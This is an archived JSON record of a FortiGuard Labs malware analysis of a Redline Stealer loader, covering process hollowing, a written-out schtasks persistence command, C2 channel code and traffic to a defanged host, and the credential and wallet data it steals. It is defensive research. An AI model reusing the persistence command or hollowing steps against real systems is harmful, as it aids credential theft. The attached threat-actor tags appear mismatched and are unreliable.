{ "id": "59a81de8-4425-4152-b443-b9c4a1872c47", "created_at": "2026-04-06T00:13:12.945947Z", "updated_at": "2026-04-10T03:37:09.411614Z", "deleted_at": null, "sha1_hash": "6192bb43b28d2e57745784ce3010183ce50aea27", "title": "Excel Document Delivers Multiple Malware by Exploiting CVE-2017-11882 – Part II | FortiGuard Labs", "llm_title": "", "authors": "", "file_creation_date": "0001-01-01T00:00:00Z", "file_modification_date": "0001-01-01T00:00:00Z", "file_size": 1276934, "plain_text": "Excel Document Delivers Multiple Malware by Exploiting CVE-2017-11882 – Part II | FortiGuard Labs\r\nBy Xiaopeng Zhang\r\nPublished: 2022-10-05 · Archived: 2026-04-05 21:27:23 UTC\r\nFortiGuard Labs recently captured an Excel document with an embedded malicious file in the wild. The\r\nembedded file with a randomized file name exploits a particular vulnerability —CVE-2017-11882—to execute\r\nmalicious code to deliver and execute malware on a victim’s device.\r\nPart I of my analysis explained how this crafted Excel document exploits CVE-2017-11882 and what it does when\r\nexploiting that vulnerability. An involved website (hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/{file name}) was\r\nfound storing and delivering numerous malware family samples, like Formbook and Redline. I dissected a recent\r\nFormbook sample from that website in part I of my analysis, including but not limited to how that Formbook was\r\ndownloaded and deployed on a victim’s device and what C2 servers it contains in that Formbook variant.\r\nRedline (also known as Redline Stealer) is a commercial malware family designed to collect sensitive information\r\nfrom infected devices, such as saved credentials, autocomplete data, credit card information, and more.\r\nAffected platforms: Microsoft Windows\r\nImpacted parties: Windows Users\r\nImpact: Collect Sensitive Information from Victim’s Device.\r\nSeverity level: Critical\r\nI start part II of my analysis by examining a Redline sample collected from that same website. In this report, you\r\nwill learn how the Redline payload is extracted from the sample, how it maintains persistence on the infected\r\ndevice, what sorts of sensitive information are stolen from the victim’s device, and how that stolen information is\r\nsubmitted to its C2 server.\r\nRedline Loader\r\nThe Redline sample I selected is “hxxp[:]//lutanedukasi[.]co[.]id/wp-includes/almac.exe”, which is a Redline\r\nloader. It is obfuscated by a .NET Obfuscator called SmartAssembly 6.9.0.114. When I analyzed this sample using\r\na .Net debugger, I found that it has a comprehensive set of obfuscation features, such as obfuscated names (class\r\nnames, function names, variable names, and more), control flow obfuscation, strings encoding, and declarative\r\nobfuscation.\r\nFigure 1.1 shows the sample in a debugger with obfuscated names and entry point function (main() function)\r\nshown using SmartAssembly.\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 1 of 15\n\nFigure 1.1 – Redline sample with full obfuscation protection\r\nIt can be deobfuscated using the de4dot tool to get a friendlier, clean version, as shown in Figure 1.2.\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 2 of 15\n\nFigure 1.2 – Deobfuscated Redline sample\r\nAfter sleeping for five seconds at the start of the Redline sample (Redline loader), it loads a data block from its\r\n.Net resource called  “brfmdFiaha”. This is then decrypted into a PE file with the key string “brfmdFiaha”, as\r\nshown in Figure 1.3, where a local variable “byte_” is pointing to the decrypted PE file shown in the memory\r\nsubtab.\r\nFigure 1.3 – Extracting and decrypting a PE file\r\nThe decrypted PE file is the payload file of this Redline variant. It then process-hollows the decrypted PE file.\r\nIt dynamically loads a group of Windows APIs to process hollow the Redline payload file, which are listed in the\r\nbelow table.\r\ndelegate0_0.Method {Boolean Wow64GetThreadContext(IntPtr, Int32[])}\r\ndelegate1_0.Method {Boolean GetThreadContext(IntPtr, Int32[])}\r\ndelegate2_0.Method {Boolean ReadProcessMemory(IntPtr, Int32, Int32, Int32, Int32 ByRef)}\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 3 of 15\n\ndelegate3_0.Method {Int32 VirtualAllocEx(IntPtr, IntPtr, UInt32, UInt32, UInt32)}\r\ndelegate4_0.Method {Boolean WriteProcessMemory(IntPtr, Int32, Byte[], Int32, Int32 ByRef)}\r\ndelegate5_0.Method {Boolean Wow64SetThreadContext(IntPtr, Int32[])}\r\ndelegate6_0.Method {Boolean SetThreadContext(IntPtr, Int32[])}\r\ndelegate7_0.Method {UInt32 ResumeThread(IntPtr)}\r\ndelegate8_0.Method\r\n{Boolean CreateProcessAsUser(IntPtr, System.String, System.String, IntPtr, IntPtr,\r\nBoolean, UInt32, IntPtr, System.String, Struct1 ByRef, Struct0 ByRef)}\r\nSystem.Reflection.MethodInfo {System.Reflection.RuntimeMethodInfo}\r\nIt calls the API CreateProcessAsUser() with a CreateFlag of CREATE_SUSPENDED (0x4) to create a suspended\r\nduplicated process of the Redline loader. It then calls VirtualAllocEx() to allocate memory space in the suspended\r\nprocess. It then copies the entire Redline payload file from the Redline loader onto it by calling the\r\nWriteProcessMemory() API. Next, it deploys the copied payload file in the newly-created process, calling APIs\r\nWow64GetThreadContext() or GetThreadContext(), ReadProcessMemory(), WriteProcessMemory(), and\r\nWow64SetThreadContext() or SetThreadContext(). Before exiting the Redloader loader process, it calls the API\r\nResumeThread() to have the suspended process restore running from the copied Redline payload.\r\nRedline Persistence Mechanism\r\nThe Redline loader is also in charge of maintaining Redline persistence on the victim’s device. Unlike Formbook\r\nbeing added into the auto-run group in the system registry, Redline uses the system Task Scheduler.\r\nThe Redline loader calls the following command-line command.\r\n\"cmd.exe\" /C schtasks /create /sc minute /mo 1 /tn \"Nafdfnasia\" /tr \"'C:\\Users\\{user\r\nname}\\AppData\\Roaming\\packtracer.exe'\" /f\r\nIt executes “schtasks.exe” with parameters to create a new task item with a task named “Nafdfnasia”, which is\r\ntriggered by the Task Scheduler every minute to execute a file called “packtracer.exe”. Figure 2.1 is the screenshot\r\nof this added Redline task.\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 4 of 15\n\nFigure 2.1 – Details of the Redline task being added to the Task Scheduler\r\nSome may wonder what this “packtracer.exe” file is. After executing the above command-line command, it\r\nperformed a DOS “copy” command to duplicate the Redline loader itself and was saved as\r\n“%AppData%/packtracer.exe” file, which is a hardcoded constant string in the Redline loader.\r\nOnce that is done, the Redline loader that extracts and runs the Redline payload will be executed by the Windows\r\nTask Scheduler every minute.\r\nDiving into the Redline Payload File\r\nI dumped the Redline payload file from memory for deeper analysis. It’s a .Net framework-based program without\r\nany obfuscation. By going through its code, I determined that the communication between Redline and its C2\r\nserver was built based on the WCF (Windows Communication Foundation) service. It builds a channel between\r\nthe client and server, with the data being transferred on that channel sealed inside an XML-SOAP (Simple Object\r\nAccess Protocol) protocol by a class ChannelFactory.\r\nThe following is a code segment that creates such a channel.\r\nChannelFactory\u003cIRemoteEndpoint\u003e channelFactory = new ChannelFactory\u003cIRemoteEndpoint\u003e\r\n(\r\n    SystemInfoHelper.CreateBind(), \r\n    new EndpointAddress(\"http://\" + address + \"/\")\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 5 of 15\n\n);\r\nthis.serviceInterfacce = channelFactory.CreateChannel();\r\nWhere:\r\nThe IRemoteEndpoint used to create a channel factory object is an interface implemented in the C2 server\r\nprogram.\r\nThe first parameter returned by “CreateBind()” specifies that Redline use HTTP as the transport for\r\nsending SOAP 1.1 messages.\r\nThe second parameter is that the C2 server uses an EndpointAddress object with the C2 server’s\r\ninformation. The “address” is the C2 server address defined in a class (see figure 3.1).\r\nBy calling the method “channelFactory.CreateChannel()”, it can create a channel (a TCP connection)\r\nbetween Redline and the C2 server. Redline can then remotely call and obtain return value if applicable\r\nfrom those IRemoteEndpoint‘s methods implemented inside the C2 server program.\r\nFigure 3.1 – The definition of the C2 server and the Redline release ID\r\nBelow is the definition of the IRemoteEndpoint interface and the methods Redline uses to call and communicate\r\nwith its C2 server. “OperationContract” and “ServiceContract” attributes show they use a WCF service\r\nframework. Once the methods are called, their method names are replaced in the XML-SOAP data with a name\r\nspecified in the “OperationContract” attribute.\r\n[ServiceContract(Name = \"Endpoint\")]\r\npublic interface IRemoteEndpoint\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 6 of 15\n\n{\r\n    [OperationContract(Name = \"CheckConnect\")]\r\n    bool CheckConnect();\r\n    [\r\nOperationContract(Name = \"EnvironmentSettings\")]\r\n    ScanningArgs GetArguments();\r\n    [\r\nOperationContract(Name = \"SetEnvironment\")]\r\n    void VerifyScanRequest(ScanResult user);\r\n    [\r\nOperationContract(Name = \"GetUpdates\")]\r\n    IList\u003cUpdateTask\u003e GetUpdates(ScanResult user);\r\n    [\r\nOperationContract(Name = \"VerifyUpdate\")]\r\n    void VerifyUpdate(ScanResult user, int updateId);\r\n}\r\nCheckConnect() checks to see if the connection status is OK. GetArguments() asks the C2 server which sensitive\r\ndata it needs to steal from the victim’s device. VerifyScanRequest() is responsible for submitting the stolen\r\ninformation to its C2 server. GetUpdates() updates the stolen information to the C2 server and asks for additional\r\ntasks from the C2 server. VerifyUpdate() is used to inform the C2 server that a task asked for by calling\r\nGetUpdates() has been completed. \r\nLet’s check out a real instance of calling these methods. Imagine that Redline calls “result =\r\nthis.serviceInterfacce.CheckConnect();”.\r\nThe request packet is shown below. Its body is sealed in SOAP:\r\nPOST / HTTP/1.1\r\nContent-Type: text/xml; charset=utf-8\r\nSOAPAction: \"http://tempuri.org/Endpoint/CheckConnect\"\r\nHost: sinmac[.]duckdns[.]org:2667\r\nContent-Length: 137\r\nExpect: 100-continue\r\nAccept-Encoding: gzip, deflate\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 7 of 15\n\nConnection: Keep-Alive\nThis is the response packet:\nHTTP/1.1 200 OK\nContent-Length: 212\nContent-Type: text/xml; charset=utf-8\nServer: Microsoft-HTTPAPI/2.0\nDate: Tue, 20 Sep 2022 18:45:28 GMT\ntrue From the body portion of the packet, the return value of the method implemented in the C2 server is “true”, which\nis carried within the XML tag “”.\nAll packets between the Redline and its C2 server are transferred in the same way and through that created\nchannel.\nStealing Sensitive Information\nLet’s proceed to checking on how Redline steals sensitive information from a victim’s infected device. Redline\ncalls the remote method “GetArguments()” to obtain the tasks its C2 server wants it to perform. This includes\nsetting switch flags for whether or not to steal data from targeted software and for the web browser folder paths\nwhere the victim’s personal data is stored.\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\nPage 8 of 15\n\nFigure 4.1 – Values returned from a remote method GetArguments()\r\nFigure 4.1 is a debugger screenshot that includes the values of variable “settings” obtained from the XML SOAP\r\ndata that replied from the C2 server when the GetArguments() method had been called.\r\nRedline has designed 22 local methods for stealing sensitive information from a victim’s device based on switch\r\nflags and file path information that the “settings” variable carries.\r\nBased on research, Redline can collect information from the following:\r\nWeb Browsers:\r\nChrome, Edge, Firefox, Opera, Waterfox, K-Meleon, IceDragon, Cyberfox, BlackHaw, Pale Moon, Iridium, 7Star,\r\nChromePlus, CentBrowser, Vivaldi, Chedot, Kometa, Elements Browser, Epic Privacy Browser, Sleipnir, Citrio,\r\nCoowon, liebao, QIP Surf, Dragon, Amigo, Torch, Yandex, Comodo, 360Browser, Maxthon3, K-Melon, Sputnik,\r\nNichrome, CocCoc,  Chromodo, Brave-Browser, CryptoTab Browser, and all other browsers built on Chromium\r\nproject.\r\nEmail Clients:\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 9 of 15\n\nMail.Ru and Thunderbird.\r\nSocial, Game, IM Clients:\r\nBattle.net,  Steam, Discord, and Telegram.\r\nFTP and VPN Clients:\r\nUran, ProtonVPN, FileZilla, OpenVPN, and NordVPN.\r\nDigital Wallet:\r\nArmory Wallet, YoroiWallet Wallet, Coinomi Wallet, Electrum Wallet, Ethereum, Exodus, JaxxxLiberty Wallet,\r\nTronLink, Nifty Wallet, MetaMask, MathWallet, Coinbase, BinanceChain, BraveWallet, GuardaWallet,\r\nEqualWallet, JaxxxLiberty, BitAppWallet, iWallet, Wombat, AtomicWallet, MewCx, GuildWallet, SaturnWallet,\r\nRoninWallet, and more.\r\nRedline can steal victims' personal information, including saved credentials, auto-fills, credit card information,\r\ntokens, private keys, cookies, profiles, logs, and more, from the default software clients listed above. It also\r\nobtains all files from the victim’s Desktop and Document folders as long as their filename contains “txt”, “doc”, \r\n“key”, “wallet”, or “seed”.\r\nBesides collecting sensitive information, it also collects a screenshot of the victim’s screen and the basic system\r\nand hardware information of the infected device, including OS version, processor information, GraphicCard\r\ninformation, monitor information, total RAM, public IP address, location, UserName, default language,\r\nTimeZone, installed programs, installed AntiVirus, AntiSpyWare and Firewalls, and a list of active processes.\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 10 of 15\n\nFigure 4.2 – View of a request packet with stolen data\r\nThis is a view of the packet with the stolen data in SOAP being submitted to its C2 server. It is sent once Redline\r\ncalls the remote method “this.serviceInterfacce.VerifyScanRequest(result);”, where the parameter “result” holds\r\nall the stolen data listed above from the victim’s device. As per the method definition of VerifyScanRequest(), it is\r\ngiven another name—\"SetEnvironment\"—in WCF. Henceforth, it uses \"SetEnvironment\" in the packet, as shown\r\nin Figure 4.2.\r\nThe Redline C2 Server Side Tool\r\nFor research purposes, I managed to obtain one C2 server program. As long as the Redline C2 server receives\r\nstolen information from a Redline system, it shows one item on its Logs subtab, and the attacker can view the\r\nstolen data through its menu, as shown in Figure 5.1.\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 11 of 15\n\nFigure 5.1 – C2 server program interface\r\nIt uses HWID to identify each victim, which is an MD5 hash code made of the victim’s DomainName, UserName,\r\nand the disk drive’s serial number.\r\nFigure 5.2 displays a screenshot of the Redline settings subtab showing the major features with which the attacker\r\ncan enable or disable features and add or remove files, paths, and filters to be scanned on the victim’s device.\r\nFigure 5.2 – Features that Redline provides\r\nOnce “System Info” in the context menu is clicked, a pop-up window displays stolen system information on the\r\nright and screenshots on the left (Figure 5.3).\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 12 of 15\n\nFigure 5.3 – System Info\r\nFigure 5.4 shows the collected credentials of the FTP clients that Redline has stolen from my test machine.\r\nFigure 5.4 – FTP clients' credentials\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 13 of 15\n\nFigure 5.5 – Statistics subtab\r\nThe server-side tool also provides a statistics feature to summarize the information received from its victims.\r\nFortinet Protections\r\nFortinet customers are already protected from this Redline variant with FortiGuard’s Web Filtering, IPS, and\r\nAntiVirus services as follows:\r\nThe downloading URL and C2 server are rated as “Malicious Websites” by the FortiGuard Web Filtering service.\r\nThe FortiGuard CDR (content disarm and reconstruction) service can disarm the embedded file inside the original\r\nExcel document.\r\nFortiGuard Labs detects this Redline variant with the AV signature “MSIL/Redline.8B8C!tr “.\r\nThe FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. The Fortinet\r\nAntiVirus engine is a part of each of those solutions. As a result, customers who have these products with up-to-date protections are protected.\r\nFortiGuard Labs provides IPS signatures \"RedLine.Stealer.Botnet\" against Redline's traffic.\r\nFortinet’s Digital Risk Protection Service, FortiRecon, continually monitors for credentials stolen using Stealers\r\n(such as Redline) being sold by threat actors on the dark web that can be used to breach a network. Request a test\r\ndrive to see how FortiRecon can provide an early warning of imminent threats to your network and data.\r\nBelow is a screenshot of FortiRecon showing a bunch of information stolen by Redline being sold on dark web,\r\nthe customers of FortiRecon have gotten an early warning of the threat.  \r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 14 of 15\n\nWe also suggest our readers go through the free NSE training: NSE 1 – Information Security Awareness, which\r\nhas a module on Internet threats designed to help end users learn how to identify and protect themselves from\r\nphishing attacks.\r\nIOCs:\r\nURLs:\r\nhxxp[:]//lutanedukasi[.]co[.]id/wp-includes/almac.exe\r\nRedline C2 Server:\r\n“sinmac[.]duckdns[.]org:2267”\r\nSample SHA-256\r\n[GAT412-IFF22.xlsx]\r\nD1EA94C241E00E8E59A7212F30A9117393F9E883D2B509E566505BC337C473E3\r\n[Redline, almac.exe]\r\n9D621005649A185E07D44EC7906530B8269DF0A84587DEB3AAC8707C5DD88B8C\r\nLearn more about Fortinet’s FortiGuard Labs threat research and global intelligence organization and Fortinet’s\r\nFortiGuard AI-powered Security Services portfolio. Sign up to receive our threat research blogs.\r\nSource: https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nhttps://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two\r\nPage 15 of 15\n\n https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two \nFigure 5.5- Statistics subtab \nThe server-side tool also provides a statistics feature to summarize the information received from its victims.\nFortinet Protections \nFortinet customers are already protected from this Redline variant with FortiGuard’s Web Filtering, IPS, and\nAntiVirus services as follows: \nThe downloading URL and C2 server are rated as “Malicious Websites” by the FortiGuard Web Filtering service.\nThe FortiGuard CDR (content disarm and reconstruction) service can disarm the embedded file inside the original\nExcel document. \nFortiGuard Labs detects this Redline variant with the AV signature “MSIL/Redline.8B8C!tr “. \nThe FortiGuard AntiVirus service is supported by FortiGate, FortiMail, FortiClient, and FortiEDR. The Fortinet\nAntiVirus engine is a part of each of those solutions. As a result, customers who have these products with up-to\u0002\ndate protections are protected. \nFortiGuard Labs provides IPS signatures \"RedLine.Stealer.Botnet\" against Redline's traffic. \nFortinet’s Digital Risk Protection Service, FortiRecon, continually monitors for credentials stolen using Stealers\n(such as Redline) being sold by threat actors on the dark web that can be used to breach a network. Request a test\ndrive to see how FortiRecon can provide an early warning of imminent threats to your network and data.\nBelow is a screenshot of FortiRecon showing a bunch of information stolen by Redline being sold on dark web,\nthe customers of FortiRecon have gotten an early warning of the threat. \n Page 14 of 15", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.fortinet.com/blog/threat-research/excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two" ], "report_names": [ "excel-document-delivers-multiple-malware-exploiting-cve-2017-11882-part-two" ], "threat_actors": [ { "id": "0661a292-80f3-420b-9951-a50e03c831c0", "created_at": "2023-01-06T13:46:38.928796Z", "updated_at": "2026-04-10T02:00:03.148052Z", "deleted_at": null, "main_name": "IRIDIUM", "aliases": [], "source_name": "MISPGALAXY:IRIDIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "75455540-2f6e-467c-9225-8fe670e50c47", "created_at": "2022-10-25T16:07:23.740266Z", "updated_at": "2026-04-10T02:00:04.732992Z", "deleted_at": null, "main_name": "Iridium", "aliases": [], "source_name": "ETDA:Iridium", "tools": [ "CHINACHOPPER", "China Chopper", "LazyCat", "Powerkatz", "SinoChopper", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "3a0be4ff-9074-4efd-98e4-47c6a62b14ad", "created_at": "2022-10-25T16:07:23.590051Z", "updated_at": "2026-04-10T02:00:04.679488Z", "deleted_at": null, "main_name": "Energetic Bear", "aliases": [ "ATK 6", "Blue Kraken", "Crouching Yeti", "Dragonfly", "Electrum", "Energetic Bear", "G0035", "Ghost Blizzard", "Group 24", "ITG15", "Iron Liberty", "Koala Team", "TG-4192" ], "source_name": "ETDA:Energetic Bear", "tools": [ "Backdoor.Oldrea", "CRASHOVERRIDE", "Commix", "CrackMapExec", "CrashOverride", "Dirsearch", "Dorshel", "Fertger", "Fuerboos", "Goodor", "Havex", "Havex RAT", "Hello EK", "Heriplor", "Impacket", "Industroyer", "Karagany", "Karagny", "LightsOut 2.0", "LightsOut EK", "Listrix", "Oldrea", "PEACEPIPE", "PHPMailer", "PsExec", "SMBTrap", "Subbrute", "Sublist3r", "Sysmain", "Trojan.Karagany", "WSO", "Webshell by Orb", "Win32/Industroyer", "Wpscan", "nmap", "sqlmap", "xFrost" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434392, "ts_updated_at": 1775792229, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6192bb43b28d2e57745784ce3010183ce50aea27.pdf", "text": "https://archive.orkl.eu/6192bb43b28d2e57745784ce3010183ce50aea27.txt", "img": "https://archive.orkl.eu/6192bb43b28d2e57745784ce3010183ce50aea27.jpg" } }